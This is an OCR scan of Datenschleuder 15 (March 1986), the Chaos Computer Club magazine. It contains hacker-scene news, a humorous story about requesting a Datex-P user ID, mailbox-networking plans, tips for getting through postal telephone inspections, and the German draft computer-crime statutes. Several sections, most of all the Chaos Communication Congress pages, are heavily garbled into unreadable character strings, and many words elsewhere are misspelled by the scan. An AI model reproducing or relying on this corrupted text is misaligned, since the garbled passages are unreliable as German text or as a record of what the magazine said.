ordnungsgemößen Geräte werden dem Teilnehmer unter Hin¬ 
weis auf sein Fehlverhalten ausgehändigt'. 

Es gibt zusätzlich noch eine Reihe von Moßnohmen, die man 
treffen kann ,um im Falle eines Falles gewappnet zu sein: 

- alle Anschlußdosen der Post sollten im Flur ongebrocht sein, 
die Post darf nur die Räume betreten, in denen Fernmeldeein¬ 
richtungen vorhanden sind. Im Bedarfsfall donn dos Telefon in 
den Flur stellen. 

- wenn immer möglich, Dosenanlagen verwenden. Das kostet 
zwar ne Markfuffzich im Monot extra, ist ober praktisch, da 
man im Bedarfsfall nur umstecken muß. 

- keine Eingriffe in den Postapparat. Lieber im ßastelloden ein 
Amitelefon für 20.- DM kaufen und daron bostein. Im Falle eines 
Falles steht immer ein ordnungsgemäßes Gerat parat. Ist unbe¬ 
dingt zu empfehlen, wenn man mit Dosenanlage arbeitet. 

• falls das nicht möglich ist, wenigstens ein paar Plomben fürs 
Telefon bereithalten und notfalls den Apporot neu versiegeln 
lassen. 

/xl/ws/frpostl 5,ws 860213 2210 goblin 


Alltagserfahrung eines Hackers 

Wo bitte gibts eine NUi? 

Alltagserfahrung eines Hackers 

Wo bitte gibts eine NUI? 

"Nun war ich es leid . Wieder war eine mühsom erkämpfte nui 
gesperrt worden, Warum wochenlang warten, um in den Ge¬ 
nuß der Datenbanken und Netzwerke in oller Welt zu gelon- 
gen? Ich beschloß, mir gonz offiziell eine Nui zu besorgen. 
Gesagt-geton, auf zum nächsten Postamt. Da Ich in Homburg- 
Bramfeld arbeite, mußte ich mit einem relotiv kleinen Postamt 
vorlieb nehmen. Rein in den Loden, oho, hinter dem Schölten 
sitzt einer, der nicht ganz den stumpfen Postlerblick draufhol. 
"Guten Tag, ich möchte gerne eine Nui für Dotex-P beontro- 
gen!" sagte ich mit freundlicher Miene. "Datex- WAS?”, kom es 
aus dem Munde des guten Mannes. Ich erklärte ihm kurz mein 
Begehren. "Nee, dos gibt s hier höchstens am Poketschalter." 
Na gut, bei Datex werden ja auch Pakete verschickt. Also ouf 
zum Poketschalter. Ein blonder Engel hinter dem Schalter lä¬ 
chelte mich erwartungsvoll an. Erneut trug ich meinen Wunsch 
vor. "Nein, dia müssen Sie an Schalter 1 gehen!", erwiderte sie 
mit verwirrtem Gesicht.. "Sorry Lady, da komme ich gerade 
her." Sie erklärte mir, ich möge kurz warten, do sie ihren Chef 
onrufen wolle. Als sie diesem dann erklörfe, hier wolle ein Kun¬ 
de Datex-P beantragen, bin ich in schallendes Gelochter aus¬ 
gebrochen, was mir böse Blicke sämtlicher Postler einbrochte. 
Mon erklärte mir, der Chef würde gleich zurückrufen, ich solle 
kurz warten. Nach ungefähr 5 Minuten ein Rückruf. Um weitere 
Mißverständnisse auszuschließen, wurde ich direkt mit einer 
netten Dome vom Fernmeldeamt verbunden. Endlich wußte je¬ 
mand Bescheid. 

Ein kurzes Gespräch brachte den gewünschten Erfolg: om 
nächsten Tag lag ein Antragsformulor bei mir im Briefkosfen. So 
schnell funktioniert es (manchmal) bei der Post. Postwendend 
schickte ich das ousgefüllte Formular zurück, auf Antwort worte 
ich allerdings noch immer. Zum Ganzen kann ich nur eins so¬ 
gen; "Pattex-D: Ausloesung — Anforderung durch Klebestelle"! 
Ich wünsche Euch mehr Erfolg, falls Ihr ähnliches Vorhaben soll¬ 
tet" schreibt MAGIC an die Redoktion. 
nuineulS.ws 860204 7000 magic 



Kinder sind Chaoten 

... sie springen bei jeder Gelgenheit aus den für sie pröporier- 
ten Entwicklungsmustern heraus, zerstören die die Entwicklung 
gründenden Ordnungen, greifen sie an,.. . 

Vor der Schulstunde 

... Erst dann, wenn Du sicher bist, alle zu beherrschen, kannst 
Du mit dem Unterricht anfangen. 

... Die tägliche Houptarbeit richtet sich gegen die Schüler. Sie 
findet nicht mit ihnen statt. Der Schulunterricht hat durchaus 


Neue Aboabteilung 

Nach dem Abdonken der bisherigen Aboabteilunq wegen frei¬ 
williger Oberlcstung gab es Monate der postmäßigen nullna¬ 
hen Grenzlätigkeit. Dazu kam allgemeine Überlastung, auch 
derCCC'85 hat einen Haufen Arbeit Gemocht. 

Dabei ist eine Menge Post liegengeblieben (Standordfrage am 
Telefon: "Liegt die Bestellung mehr als drei Monate zurück? ]. 
Jetzt hat die neue Aboobteilung die Verarbeitung eingehender 
Daten steuernd aufgenommen. 

Die frische Lieferung Hackerbibeln (im guten Buchhandel unter 
"Betriebssystemen” zu finden) wird, nun postgenehmigt, als ßü- 
chersendung verschickt (Eben beschwerte sich noch einer, wo 
seine Hackerbibel blieb, d.s.). 

Die neue Aboabteilung ist stolz darauf, in der letzten Woche 
nicht nur tagesaktuell geworden zu sein, sonden — wegen 
gleichzeitigen Aufräumens einiger Privatstapel — auch ältere 
Posthäufchen bearbeitet zu haben. 


Züge von Grabenkrieg. Beide Seiten hoben sich eingerichtet. 

... Geschrei ist kein Herrschaftsinstrument. Es enthüllt die Hil¬ 
flosigkeit. 

Unsichtbare Überwachung 

. .. Unsichtbarkeit Ist Bedingung für das Funktionieren des 
Oberwachungssysfems. 

.. . Kein kommunikotiver Akt. der nicht unter den Augen des 
Lehrers (oder sonstwem, Anm. ds) vollzogen werden müßte. 
Kommentar der Redaktion: 

Ein Buch, dos Einschränkungen informationeller Selbstbestim¬ 
mung im Alltag gut beschreibt. Die Verollgemeinerung vom 
Lehrer hinter den Rücken der Klasse zur unsichtbaren Überwa¬ 
chung bei Telefon und Telekommunikotion etc. muß der Leser 
leisten. Schon die gut gegliederte Lehreronalyse mocht dos 
Werk zu einem Hondbuch im Grobenkrieg für beide Seiten, ct- 
do 

Schulszenen. Vom Herrschen und vom Leiden. 

Friedrich Thiemonn. 

ISBN 3-518-11831 *3 DM 1 0, rund 4 Pfennig pro KB. 


Der älteste Brief stammte aus 1984. 
altpstl 5.WS 860226 0030 

















Die Wüste lebt 

Deutschlonds Mailboxscene gerät in Bewegung. Aus den ein¬ 
zelnen Dotenoosen In den Stödten und Dörfern sollen sollen 
blühende Informotionsfelder für olle werden. Notwendig Ist do- 
bei in erster Linie, doß die Betreiber der lokolen Systeme eine 
Möglichkeit hoben, Informationen auszutauschen Bereits auf 
den 7. Hessischen Computertagen in Neu-Isenburg bei Frank¬ 
furt im September letzten Johres trafen sich die engogierten Sy- 
sops einiger privoter Bulletin ßoords, um Erfohrungen auszu¬ 
tauschen und Wege zur Zusammenarbeit zu finden. Es stellte 
sich dabei heraus, daß es vorrangig wichtig ist, ein Informa- 
tionsmedium zur Verfügung zu hoben, daß es dem einzelnen 
Betreiber ermöglicht, preisgünstig Informotionen on die ande¬ 
ren weiterzugeben. Konsequenterweise konn so etwas nur über 
Dolex laufen; die Errichtung eines entsprechenden Systems 
oder die Nutzung eines solchen ist also Voraussetzung für so 
ein Projekt. 

Auf dem CCC85 wurden diese Probleme dann konkreter ange¬ 
packt, der Tog des Sysops brachte eine Reihe fruchtbarer Ge¬ 
spräche, on deren Ende der Pion stond, InterPoolNet zu grün¬ 
den. Aufgabe dieses Vereins soll es sein, die Telekommunikation 
in freundschaftlicher und völkerverstöndigender Weise zu för¬ 
dern. Im Klartext heißt dos, daß jeder, der Informationen hot, 
diese einen großen Topf werfen kann, ous dem sich alle Ver¬ 
einsmitglieder bedienen können. Auf diesem Wege wird den 
Sysops ein Instrument in die Hand gegeben, das dem Otto 
Normaluser den Zugong zum Weltdatennetz beitet. Aktuelle 
Irifromationen können so aus den entlegensten Teilen der Welf 
direkt an den interessierten Benutzer eines lokalen Bulletin 
Boards gelangen. 

Wir berichten in einer späteren Ausgabe über IntePoolNet, 
wenn der Verein die ersten technischen und rechtlichen Hürden 
genommen hot. 

/xi/ws/inferpIS.w! 19860204 22051 

gobiin 


KURZMELDUNG 

Datenschutz bei Bestellungen an den CCC 
"Liebe Chaoten, ich möchte eure Datenschleuder obonnieren. 
Anbei ein V-Scheck über 30,- DM und eine Studienbescheini¬ 
gung." heißt es in einem Brief an die Redaktion. 

Die beigefügte "Immatrikulotionsbescheinlgung" sieht aus wie 
ein Schweizer Käse. Unter der Nomensreile klafft dort, wo Ge¬ 
burtsdatum und -ort (19 Zeichen) standen, ein Loch. Auch acht¬ 
stellige Matrikelnummer und dos Semester der Erstimmatrikula¬ 
tion sind säuberlich ausgeschnitten. Beim "Fachsemester” 
schnitt der Absender ein zulcleines Loch: es sind weniger als 10. 
DerStudiengang "Physikalische Technik” wurde nicht zum Köse- 
ioch. Der Abonnent wird deshalb als angehender Fachmann auf 
diesem Gebiet bei uns registriert" meint die Aboabteilung. 
postwel 5.WS 860226 0006 



Perverse Staubsauger? 

Beim Reinigungsversuch einer ßlM-Kugelkopfschreibmaschine 
mit einem Staubsauger wurde das Farbband mit derariger 
Wucht ausgefädelt und eingesougf, daß sin Herousziehen des¬ 
selben noch dem Ausschallen nicnt mehr möglich war und dos 
Farbband durchgeschnitten werden mußte, domit die einge- 
saugten Meter im Staubbeutel verschwinden konnten. 

staubsau.w« 8&01 ^ & 1 &T T wau 




Datensch1euder 
15 = Mars 1986 

Das wissenschaftliche Fachblatt Für Datenreisende 
Ein Organ des Chaos Computer Clubs 






CCC-lntern, HAMBURG. ■— Als Nachwehe des Chaos Comuni- 
cotion Congresses im Dezember letzten Jahres landete ein Teil 
des CCC-Archlves im nächsten Papiermüllcontainer. Durch ra¬ 
sche Hilfe Icommunoler Müllmenschen konnte der Schaden be¬ 
grenzt werden. Dte Handbücher zur Polizeiverwendung wurden 
wiedergefunden. Derzeit wird das Material aufgebügelt. 
SCHECKKARTEN KÖLN — "Zwei Kölner haben durA Manipu¬ 
lationen on Geldautomaten einen Schaden von 80.000.- DM 
verursacht. Der für den technischen Teil „verantwortlich* be- 
zeichnete sich in der Vernehmung als „Computer-Freak*. Er ha¬ 
be die Arbeit am Heimcomputer als Hobby betrieben. Zu den 
Experimenten mit Scheckkarten sei er durch eine Fernsehsen¬ 
dung angeregt worden." So die Pressestelle der Polizei In Köln 
am 29.1.86. 

Auch beim CCC in Homburg laufen Anfragen von durch Manl- 
pulotiooen betroffenen sowie von wissenschaftlich Arbeitenden 
zu diesem Themenbereich auf. Ein Beitrag über Technik und ge¬ 
setzliche Grundlogen ist für die HAßl Teil 2 vorgesehen (next 
year). 

AKTIVITÄTEN — Für Datenschleuder 16 ist eine Obersicht von 
Adressen, Gruppen und Treffen Datenreisender geplont. Alle 
Gruppen seien gebeten, eine kurze Seibsfdorsfellung über ihre 
Anliegen, Kontaktadresse und elektronische Anschrift on die 
Leitstelle 1188 einzusenden. 

POST BONN — Das Referat 2640 des Bundespostministeriums 
stellte zum November 85 den Entwurf zur Telekommunikation¬ 
sordnung (TKO) vor. Wichtigste Neuerung ist die Unterschei¬ 
dung zwischen „Anschluß" (die Dose von der Post) und „Endstel¬ 
le* (Akustikkoppler, Modem oder Telefon!}, wobei die Endstelle 
auch feilnehmereigen sein konn. Die Endstelle (Telefonapparat) 
oder Teile (Gebührenzähler) davon sollen zukünftig keine for- 
molen Bestandteile des Anschlusses sein. Der Anschluß wird da¬ 
nach unterschieden, ob er eine „einfache Endstelle* oder aber 
für eine „Anlage", die Vermiftlungs-, Verteil-, oder Konzentra¬ 
torfunktionen übernimmt (Mailbox?), bestimmt ist. Danach, und 
nach den in Anspruch genommenen Vermittlungs- u. o. Verteii- 
dienstlelstungen z. B. Bildschirmtext, Teletex oder ISDN sollen 
die Gebühren berechnet werden. Wer seine HARDWARE nicht 
von der Post bezieht, spart. 

Wie bisher sollen private Endeinrichtungen (Datenklos, Mo¬ 
demkarten), die eine Teilnahme am öffentlichen Telekommuni¬ 
kationsdiensten ermöglicht, zugelassen sein. Zuständig ist wei¬ 
terhin das ZZF, das eine „Benutzungserlaubnis" erteilt. Die DBP 
wif/ [edoch für eine Reihe von Endstelleneinrichtungen Ausnoh- 
men zulassen. Eine „Verwaltungsanweisung* regelt näheres. Es 
ist z. B. sich das Recht auf Abschaltung bei Mängeln vor. 

Die TKO soll 1988 die Rechtsgrundlage für eine längst überfälli¬ 
ge liberolisierung im Fernmeldewesen schaffen. Die geplanten 
Änderungen sollten aber nicht davon oblenken, daß in diesen 
Tagen immer noch Mailboxbetreiber, die mit ungeprüftem Ge¬ 
rät arbeiten, Besuch vom Gilb erhalten. 

Dieses als kurzer Abriß, mehr später! LS23 
Steffl 15 .WS 860323 01 






Kleine Fische 

Intermail — Vernetzung der lokalen Systeme 
Zukunftsorientierte Dotenkommunikation betreiben bedeutet 
heute, an der Schwelle zum Informatfonszeitalter, daß die Ver¬ 
netzung der bestehenden Systeme vorangetrieben werden 
muss. Umfassende Information setzt umfassende Vernetzung 
der verschiedensten Informationsysteme voraus. Bislang woren 
die sogenannten Low-Cost-Sysfeme, olso von privat betriebene 
Mallboxen auf Home- und Personalcomputern von dieser Ent¬ 
wicklung ousgeschlossen. Das soll sich schon In nächster Zu¬ 
kunft ändern, um ouch dem Ötto Normaluser’ die vernetzte 
Welt der Daten erschließen. 

Bereits seif einiger Zeit existiert in Hamburg eine lose Gruppie¬ 
rung von Betreibern privater Low-Cost-Boxen, die unter dem 
Nomen ßulietinboord Service Hamburg versucht, Ordnung ins 
Chaos zu bringen und durch gemeinsame Anstrengungen der 
Sysops Schritte in dieser Richtung zu machen. 

Auf dem CCC85 wurde erstmols ein Vorschlag zur Vernetzung 
der lokalen Systeme mit dem Arbeitstitel ’lntermall’ vorgestellt. 
Es handelt sich hierbei um ein Konzept, dos Innerholb der kom¬ 
merziellen Mallboxsysteme bereits realisiert ist und dort zu den 
Standarddienstleistungen gehört. Intermail erlaubt dos Versen¬ 
den persönlicher Nachrichten an andere User, ohne daß diese 
zwangsläufig in allen lokalen Boxen vertreten sein müßen. Es 
genügt völlig, in einer Mailbox als Benutzer eingetrogen zu 
sein, um von jedem anderen User der anderen Boxen onge- 
schrieben werden zu können. Der Vorteil liegt auf der Hond. 
Wer bisher als engagierter Nutzer der lokalen Systeme gez¬ 
wungen war, mehr oder weniger regelmäßig in allen Boxen ver¬ 
treten zu sein, kann sich nunmehr darouf beschränken, die für 
ihn persönlich wichtigsten onzurufen. 

Technisch realisiert wird Intermall durch einen eigensföndigen 
Rechner, Intermailcontroller oder kurz IMC genonnt. Dieser 
fragt regelmäßig zu festgelegten Zeiten die lokalen Systeme 
auf vorhanden Intermail ab, verarbeitet diese und verteilt sie 
wieder. Natürlich kostet so etwas Geld, In einem regionalen 
Netzwerk mit zehn Mailboxen fallen bei täglichem Update 
durch den IMC rund 130.- DM pro Monat on, selbst wenn keine 
Nachricht verarbeitet werden muß. Daraus folgt zwangsläufig 
der Schluß, daß Intermail nur dann sinnvoll ist, wenn ousrei- 
chend zahlende User daran teilnehmen. Nach Schötzungen der 
Homburger Arbeitsgruppe funktioniert Infermoil kostendec¬ 
kend, wenn rund dreißig User mit monatlichen Beitrögen von 
vier bis fünf DM dabei sind. 

In der Praxis sieht die ganze Geschichte nun so ous, doß dos 
Konzept Intermail bereits weitgehend realisiert ist. Die ersten 
Probeläufe sind abgeschlossen und bis spätestens Mitte Fe¬ 
bruarwird Inlermail in Homburg als Dienstleistung für die Nut¬ 
zer der privoten Systeme zur Verfügung stehen. Selbstverständ¬ 
lich wird dos Intermail-System allen interessierten Betreibern 
zugänglich gemacht werden. Ansprechpartner hierfür Ist der 
BBSH, zu erreichen über die CLINCH-Box Hamburg, 
interml 5 861306 2035 goblin 


C9927F 


Datemchleuder " Sonderausgabe 

CHROS COMMUNICRTION CONGRESS 85^ 

EIDELSThDTER BÜRGERHAUS Hflf-BURG 27.12.-23.12.05 

Das wissenscha^^tliche Fachblatt BTX 320«201>B5S322 


Der Congress tanzt 

FrUNer u*r dir Tanz Rudrick akivcr Komit 
atkatio«: lin Or1 dar ItDataJctauiaalmi ULcr gt- 
osraiitcfie Grcazt* Mawcg. Jcfal hat der CCC 
tiMa Bodia lwrtiit4auidim tuli aur Jahrttwti- 
dt SjtDpL DatearciMidt, Pfreakt uad aadert 
Koianuiiikafioaibistülartc Ln Eidibtädfer Bik- 
serhato tun Tanz auBordtra koaBta. 
bat Hotto: Du darill 
Dil Hcitagc; Bznufat dir Nzicn Hadica! 

Ur Mollen den weder durch Preii-noch durch 
Zcnturrchranken gehinderten Fluß der Informa¬ 
tionen. Ur woDen Datenbanken, gefüllt mit 
releuanter Information. Wir wollen Knoten¬ 
punkte einrichten, vorhandene unlerttiiben und 
untereinander vemetren. Ein Marktplatz der 
foiien Information mit Anrchluß an die Weil 
Herrschende Institutionen haben sich nicht auf 
die neuen Medien gestürzt, um den freien Infor¬ 
mationsaustausch zu fordern, sondern um diese 
Medien zu kommerzialisieren und ihren Interes¬ 
sen dienstbar zu machen. Wir haben andere 
Interessen. 

Uavor hat der Große Sus^ einige Slolpersteini 
telegt, in Form der POST und der etablierten 
Informationsuirtschaft, die eifersüchtig ihre 
Pfründe bewachen. 


die eifersüchtig 


OHJtochl«¥l 

r . 1 ^ 6710190 d 40 S 1 


EWIN ERFWSVCoN^ 


KONTBOLLrURJ^ ryV 

filT * ww 

2£)l'fMUoi”l)TEI 


ipon«xxriirASSTxxxx«C!Ml Mx«»»xx«im«x« » »«»x» x»»n 

inOia0MQ51ZXXXXX5/ai769»2tO6?XXXXXXXXXIXXXXXXXXXXXIj 



Oie gepbnte Novellierung der Gesetze über die 
W HsebaftskrimtnaHtät und die ßngst des Etla- 
hlühment vor mündigen - sprich informierlen - 
Bürgern tragen auch nicht dazu bd, einen wlrk- 
bch freien Informationtautiauicb lu trmüfH- 
chen. Aber nicht genug, schlichtes Unwisstn.die 
oft unnötig kompbzierta Bedienung der techni¬ 
schen Etnrehtungen und eine diffuse fliest vor 
dem Jobkiller Compuier machen (luikliirungs- 
arbeü nötig. 

Hier bittet der Congress tum Tanr. Uir wallen 
voneinander lernen, nicht nur den Umgang mit 
der Technik, sondern auch mit xmt. U ir können 
lernen, Schwellenkngste tu überwinden und dte 
bestehenden Einrichtungen lur yerhreitung un¬ 
gehemmter Information tu nutzen, con- 
Lnz.wt851228 2305 

H jCHAXDIENSf 

■ Teilnehmebere ch ligieiB , ^ 





CtieM ^ 
ConvTwi^atfOi^ 
Conortii 1985 


Mi 


H MC 


• r 


Sei te 







Freie (?) Republik Eidelifcdf 

W k wlio* la «crfkBjiMB Jkk Ul lu CoMrui* 
«cliiic *Hük>k(k ZoM*. Dt>k ici Hcbl- 
Ickklon ilkßdu »ich «liiu Vtriläadab mi 
Ziiipolsiikvdk Ur« Dintlwaiii ia RuId lic- 

UntB- rtu-ken Sicherheiliuorltthninf en...‘ 
rUnd in ^ Zritunf. Diei Jaiir wurde ein neuer, 
koctiitempfindjicher Deteklor in tthwanes Pli- 
tiiliroiv' «ertchkdener DureKnencr CGummik- 
nuipclthnlicJi) cinfcliaut und mH roten Leuchl- 
kleDulreikn vcniö-l Er xiehl aLiohil leFahrlicii 
autund piepthircliterbch. t1 axünalemphndhch- 
Veil: 1 Scltraukc. Er findet auch alle möjlichen 
anderen Gerate, die lum OkbtUhl penönlkber 
Daten dienen kännlea. Dat bißchen Elchironilk 
und die Batterien dnd in ein Handiunkierat 
lam Umhanfen enf ebaul. U iehUie Erfäniunf 
Bl die Femtprechuerbindvnr tur umkhlbartn 
EintaUleiUin«. Dat Game ht die Cbaoi-Mini- 
fiuloritaücinneil und macht aut jedem, der tie 
träft, eilt bötbsl lindniektuoQe K.ontrollper- 
>on. 

Dkie maachem ctwai merkwürdif anmutenden 
Uorkthrunfcn faranlieren unt immerhin einen 
cinifermaßen uohebelliften flufenlhall h der 
freien R»ubLik Eideliledl, deren Grenien bii 
Sonntif Abcad feilen und dk Seihttuerwahunf 
k\ SEkerheHtiraeen erfordert, um prfenlonelle 
*Sckützer‘ kerukifl uou ihrur Auifake frrcklel- 
len tu kbnae«. 

Dazu fckörlauck dat SicherhciUiftlem im K a- 
tastropkeafaH Um fatalen Folien einet lokhen 
F allet «onnkeuf cn, Wirde dkkommunikatiam-' 
technische Infraztruktair nach bestem Behorden- 
wisna mit dem Uaterttübunf auffcbaut und 
CTfänzl dirch im rauhen HacknllUf bewahrte 
Geräte 

Dat teardnele UerhsKn der Räume im Gefah- 
reaiall wird vom Chaot-Oknti imlerttübt und 
durch Laulsprecberdurchtafen ferteueri. Der 
Code kt äbalkh dem ki Großkaufhäutem fc- 
wähJt und noch baJbfcheim. Die Durchiaie 
'Kam nach Notkau* bewirkt durch dk ßkU- 
vierunt unhcwvßter Denkinhalle dat Freima- 
cJien des £mfan|ihcreichi samt Kaste für den 
fcordnetea Autzuf. 
rcpullik.wt 8S122o ISrff c 

UMFRAGE; 

f0/( der Beirafien wollten 'Konlakle anknüp* 
fen, W. 'Neuei fiber DFÜ erWren', ein 
DriilcJ 'neue Software bekommen'. Einer dm 
Befr^ften äi£crte als Grund für seine flnrtke, 
er wolk 'mal WAU penöihch kenaenlemsD . 

Dnl Ufcrteldcr telhehmer kirnen NICHT lut 
dem Großraum Hamluri, eondem waren eB. 
aut Kirbiihe, Köln oder Bramen injereltt 
wmira/m.y$SSi228 flf.'lle 


Eurobox 

kl ein ekktoniichet Cafe-Haut iwkchen Dublin 
und Athen. Die Eurobox ttarlei am 1.1.86 und 
wird uon Milfbedem der Eura-Gninen helrie¬ 
hen. In der Eurobox tolkn etnerielts wertchlede- 
ne Inlormaikntdknik der EG und des Europa- 
parhmenU veriutbar lemachl werden, anderer- 
seitt »oU sic dk U ratebum hir citene Iniorras- 
tionjJiensle bieten. Und scnliettbch urd tie tkh 
hofientbch aui die Dauer au einem Nett von 
Inlertnierlen autueilen, die direkt Info't zu 
verschiedenen Themen austauschen. 

Eurobox wird demnächil als lelrenntei Menü 
innerhalb der COM BOX ertewinen. Themen 
uon BrtUem könnten ttin: 

- Aktuelles im EP 

- Friuenrechle 

- Dritte U cU - Landw irlschaft 

- Umweltschutz 

- Gen/Bio-Technolofie 

- Chemie und Gift 
-Emifranten, Asylanten, Jobber 

- Neue Technolof kn 

- Action in Europc 

- US-Euro-Links 

' U ho k w ho and where 

Eurobox ist technisch feseheneineCloted-Uter- 

Group. Auster den unvermeidfichen Gebühren 

an 

Pott und Com box darin keine finanziellen Inter¬ 
essen verwirklichl werden. inUrestenlen wenden 
zkh an 

Btiidil;l Hirlii 

in der Box «tir 
Im Mehrinfhof 
Gneisenaustr. 2 
1000 Berlin £1 
Tel 030d532 22 22 
eurobox.wt 8S1228 05:DOe 


Heiße Dafen, kühle kCoppler 
Dk K 01 ^ rett-fi OK, deren Nummer in allen Ham- 
burter Boxen bcft, erhieh am Samstai von 7 
bk if Uhr ca. 20 Anrufe. Leideritt kein Prola- 
koD uerhifbar, da die Box am frühen Samsla- 
«ahend ibsiürzte und der fesamte Dkketienin- 
niH verkrtn fbif. Die ^sOp'i uertuebien, in 
Nachtschicht, die Box wirair hochiufahren. 
Auferund der Ubertrafunfsprobleme, hedinft 
durch iauies Hinterfrundfclächter, wurde von 
den anwesenden Experten während desK oneret- 
*cs eine neue Tcchnolofic cniHickclt der Kop- 
pkr liehl nun itoikrlim KUfdschrtik. 
iox.8Sim OfsOde 


Seite 6 


2)atcn§rf)Icubcr Seite 7 

15 = Mar?, 1986 

Wissenschaftliches Fachhiatc für Datenreisende 
Herausgegeben vom Chaos Computer Club 

Deutscher Bundestag — lO.Wahlperiode DrUCksache 10/5058 

Beschlüsse des 6. Ausschusses (2) Der Versuch ist strafbar. 

2c. § 202 Abs. 3 erhSIt folgende Fassung: (3) § 267 Abs. 3 ist anzuwendon. 

§270 

Täuschung im Rechtsverkehr bei 
Dntonverarbeitung 

Der Täu.schung im Rechtsverkehr .steht die 
fälschliche Beeinflussung einer Datenverarbei¬ 
tung im Rechtsverkehr gleich," 


»<(3) Einem Schriftstück Im Sinne der Absät¬ 
ze 1 und 2 steht eine Abbildung gleich.'* 

2d. Nach 5 202 wird folgende Vorschrift eingefügt; 
„8 202 a 

Aussp&hen von Daten 


(1) Wer unbefugt Daten, die nicht lür Ihn be¬ 
stimmt und die gegen unberechtigten Zugang 
besonders ge.sicherl sind, sich oder einem ande¬ 
ren verschafft, wird mit Freiheitsstrafe bis zu 
drei Jahren oder mit Geldstrafe bestraft. 

(2) Daten Sm Sinne des Absatzes 1 sind nur 
solche, die elektronisch, magnetisch oder sonst 
nicht unmittelhar wahrnehmbar gespeichert 
sind oder übermiilelt werden." 

2c. ln 8 205 Ab.s, 2 Satz J wird der Punkt durch 
einen Strichpunkt ersetzt und folgender Halb¬ 
satz angefügt: 

„dies gilt nicht in den FBIlen des § 202 a." 

3. Nach § 263 wird folgende Vorschrift eingefügt: 

263 a 

Computorbetrug 

(1) Wer in der Absicht, sich oder einem Drit¬ 
ten einen rechtswidrigen Vermögonsvorteil zu 
verschaffen, das Vermögen eines anderen da¬ 
durch beschädigt, daß er das Ergebnis eines Da- 
tenverarbeitung.svorgangs durch unrichtige Ge¬ 
staltung des Programms, durch Verwendung 
unrichtiger oder unvollständiger Daten, durch 
unbefugte Verwendung von Daten oder sonst 
durch unbefugte Einwirkung auf den .Ablauf be¬ 
einflußt. wird mit Freiheitsstrafe bis zu fünf 
Jahren oder mit Geldstrafe bestraft. 

(2) § 263 Abs. 2 bis 5 gilt entsprechend." 

§ 266 b 

IVlinbrauch von Scheck- und Kreditkarten 

(1) Wer die ihm durch die Überlassung einer 
Scheckkarte oder einer Kreditkarte einge- 
räumte Möglichkeit, den Aussteller zu einer 
Zahlung zu veranlassen, miflbraucht und die¬ 
sen dadurch schädigt, uird mit Freiheitsstrafe 
bis zu drei Jahren oder mit Geldstrafe bestraft. 

(2) § 248 a gilt entsprechend." 

..§ 269 

Fälschung beweiserheblicher Daten 

(I) Wer zur Täuschung im Rechtsverkehr be* 
waiserhebliche Daten so speichert oder verän¬ 
dert. daß bei ihrer Wahrnehmung eine unechte 
oder verfälschte Urkunde vorliegen würde, oder 
derart gespeicherte oder veränderte Daten ge¬ 
braucht, wird mit Freiheitssfrafe bis zu fünf 
Jahren oder mit Geldstrafe bestraft. 


7. In §271 Abs. 1 werden nach dem Wort ..Bü¬ 
chern" ein Beistrich uiid da.s Wort „Dateien" .so¬ 
wie mich dem Wort „beurkundet" die V'orte 
..oder gcspeichcrl"' eingefiigt. 

fl. In § 273 werden nach dem Wort „Heurkundurg" 
die Worte „oder Datcnspeiclierung" eingefügt. 

§ 274 Ab.s, 1 Wird wie folgt genndort: 
noch Nummer 1 wird folgende Nummer 2 
eingefügt: 

..2. beweiserhebliche Daten (8 202a Abs.2), 
über die er nicht oder nicht ausschließlich 
verfügen darf, in der Absicht, einem an-* 
deren Nachteil z'urufügen, löscht, unter¬ 
drückt, unbrauchbar macht oder verän¬ 
dert oder"; 

„8 3038 

Datenveränüerung 

(1) Wer rechtswidrig Daten (8202a Abs.2) 
löscht, unterdrückt, unbrauchbar macht oder 
verändert, wird mit Freiheitsstrafe his zu rwei 
Jahren oder mit Geldstrafe bestraft. 

(2) Der Versuch ist strafbar. 


§ 303 b 

Computersabotage 

(1) Wer eine Datenverarbeitung, die für einen 
fremden Betrieb, ein fremdes Unternehmen 
oder eine Behörde von wesentlicher Bedeutung 
ist, dadurch stört, daß er 

1. eine Tat nach § 303 a Abs. 1 begeht oder 

2. eine Datenverarbeitungsanlage oder einen 
Datenträger zerstört, beschädigt, unbrauch¬ 
bar macht, beseitigt oder verändert, 

wird mit Freiheitsstrafe bis zu fünf Jahren oder 
mit Geldstrafe bestraft. 

(2) Der Versuch ist strafbar. 


§303c 

Strafantrag 

In den Fällen der §§ 303 bis 303 b wird die Tat 
nur auf Anfrag verfolgt, cs sei denn, da/) die 
Slrafverfo/gungsbehörde wegen des besonderen 
öffentlichen Interesses an der Strafverfolgung 
ein Einschreiten von Amts wegen für geboten 
bUli." 




^atcn§if)lcuiict 

15 = März 1986 

Wissenschaftliches Fachblatt für Datenreisende 
Herausgegeben vom Chaos Computer Club 


Zu Artikel 1 Nr. 2c und 2d — §202 Abs. 3; §202a 
StGB — 


1. Der Ausschuß schlägt die Aufnahme eines in den 
Entwürfen nicht enthaltenen Tatbestandes ge¬ 
gen das .^usspähen von Daten*' vor, der das un¬ 
befugte Verschaffen von besonders gesicherten, 
nicht für den Täter bestimmten, nicht unmittel¬ 
bar wahrnehmbaren Daten unter Strafe stellt 
Als Daten dargestellte Informationen sollen da¬ 
mit ln umfassender Welse strafrechtlich gegen 
Spionage geschützt werden, als dies nach gelten¬ 
dem Recht möglich ist Der gestiegenen Bedeu¬ 
tung des Wertes von Informationen wird damit 
strafrechtlich Rechnung getragen. Die in den 
Entwürfen vorgeschlagenen Tatbestände zur 
Computerkriminalität werden dadurch in einem 
wichtigen Bereich ergänzt 

a) Ausgangspunkt waren in der öffentlichen An¬ 
hörung erhobene Forderungen, strafrechtlich 
das „unbefugte Abhören und Anzapfen von 
Datenübertragungssystemen“ bzw. den „unbe¬ 
fugten Zugriff auf fremde Datenbanksysteme“ 
(Sieber, Prot Nr. 26 S. 177; Anl. S. 267 f.) unter 
Strafe zu stellen bzw. Überlegungen, einen 
verstärkten strafrechtlichen Schutz gegen 
Computerspionage und das unbefugte Ein¬ 
dringen in Datenverarbeitungssysteme (ein¬ 
schließlich des unbefugten Herstellens und 
Gebrauchens von Systemen, die der Überwin¬ 
dung von Sicherungsanlagen dienen) (Oertel 
(Nixdorf. Computer AG). Prot S. 182f„ Anl, 
S. 36£f.], 2 u schaffen. Nach Sieber stellt das 
.Abhören“ von Datenübertxagungsleitungen 
einen der wichtigsten Ansatzpunkte der Com¬ 
puterspionage im Bereich datenfemverarbei- 
tender Systeme dar. Es biete weit größere 
Möglichkeiten als das Abhören von Telefon¬ 
gesprächen. da digital übertragene Informa¬ 
tionen mit Hilfe von Computern sehr viel 
leichter maschinell analysiert werden könn¬ 
